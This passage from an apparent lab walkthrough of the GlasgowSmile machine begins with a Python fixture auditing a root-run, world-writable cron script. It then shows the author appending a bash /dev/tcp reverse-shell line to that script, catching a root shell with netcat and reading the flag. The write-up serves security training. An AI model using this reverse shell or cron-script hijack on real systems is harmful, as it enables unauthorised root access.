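    """Rebuild the GlasgowSmile layout in a temp dir (constructed fixture) and audit both cases."""
    with tempfile.TemporaryDirectory() as home:
        hidden = os.path.join(home, "SomeoneWhoHidesBehindAMask")
        os.mkdir(hidden)
        bad = os.path.join(hidden, ".trash_old")   # user-owned, writable, yet run by root
        good = os.path.join(home, "hardened.sh")    # mode 0755 in a directory only its owner can write
        for p in (bad, good):
            with open(p, "w") as f:
                f.write("#!/bin/sh\nexit 0\n")
        os.chmod(bad, 0o777)
        os.chmod(good, 0o755)
        return {
            "bad": audit_script(bad),                               # judged against real root (uid 0)
            "good": audit_script(good, trusted_uids=(os.getuid(),)),  # creator treated as the trusted owner
        }


if __name__ == "__main__":
    for name, findings in demo().items():
        print(name, findings or ["no findings"])
```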

7. Reverse shell

  • The idea is simply to get the line bash -c 'bash -i >& /dev/tcp/10.0.0.11/7777 0>&1' written into the .trash_old file
penguin@glasgowsmile:~/SomeoneWhoHidesBehindAMask$ echo "#/bin/sh">.trash_old
penguin@glasgowsmile:~/SomeoneWhoHidesBehindAMask$ cat .trash_old
cat .trash_old
#/bin/sh
penguin@glasgowsmile:~/SomeoneWhoHidesBehindAMask$ echo "bash -c 'bash -i >& /dev/tcp/10.0.0.11/7777 0>&1'" >> .trash_old
penguin@glasgowsmile:~/SomeoneWhoHidesBehindAMask$ 
penguin@glasgowsmile:~/SomeoneWhoHidesBehindAMask$ cat .trash_old
cat .trash_old
#/bin/sh
bash -c 'bash -i >& /dev/tcp/10.0.0.11/7777 0>&1'
# After writing it, wait quietly for a minute
  • A minute later, cron runs .trash_old automatically
┌──(root💀kali)-[~]
└─# nc -vlnp 7777        
listening on [any] 7777 ...
connect to [10.0.0.11] from (UNKNOWN) [10.0.0.34] 51098
bash: cannot set terminal process group (2441): Inappropriate ioctl for device
bash: no job control in this shell
root@glasgowsmile:~# ls
ls
root.txt
whoami
root@glasgowsmile:~# cat root.txt
cat root.txt
  ▄████ ██▓   ▄▄▄       ██████  ▄████ ▒█████  █     █░     ██████ ███▄ ▄███▓██▓██▓   ▓█████ 
 ██▒ ▀█▓██▒  ▒████▄   ▒██    ▒ ██▒ ▀█▒██▒  ██▓█░ █ ░█░   ▒██    ▒▓██▒▀█▀ ██▓██▓██▒   ▓█   ▀ 
▒██░▄▄▄▒██░  ▒██  ▀█▄ ░ ▓██▄  ▒██░▄▄▄▒██░  ██▒█░ █ ░█    ░ ▓██▄  ▓██    ▓██▒██▒██░   ▒███   
░▓█  ██▒██░  ░██▄▄▄▄██  ▒   ██░▓█  ██▒██   ██░█░ █ ░█      ▒   ██▒██    ▒██░██▒██░   ▒▓█  ▄ 
░▒▓███▀░██████▓█   ▓██▒██████▒░▒▓███▀░ ████▓▒░░██▒██▓    ▒██████▒▒██▒   ░██░██░██████░▒████▒
 ░▒   ▒░ ▒░▓  ▒▒   ▓▒█▒ ▒▓▒ ▒ ░░▒   ▒░ ▒░▒░▒░░ ▓░▒ ▒     ▒ ▒▓▒ ▒ ░ ▒░   ░  ░▓ ░ ▒░▓  ░░ ▒░ ░
  ░   ░░ ░ ▒  ░▒   ▒▒ ░ ░▒  ░ ░ ░   ░  ░ ▒ ▒░  ▒ ░ ░     ░ ░▒  ░ ░  ░      ░▒ ░ ░ ▒  ░░ ░  ░
░ ░   ░  ░ ░   ░   ▒  ░  ░  ░ ░ ░   ░░ ░ ░ ▒   ░   ░     ░  ░  ░ ░      ░   ▒ ░ ░ ░     ░   
      ░    ░  ░    ░  ░     ░       ░    ░ ░     ░             ░        ░   ░     ░  ░  ░  ░



Congratulations!

You've got the Glasgow Smile!

JKR{68028b11a1b7d56c521a90fc18252995}


Credits by

mindsflee
root@glasgowsmile:~# 

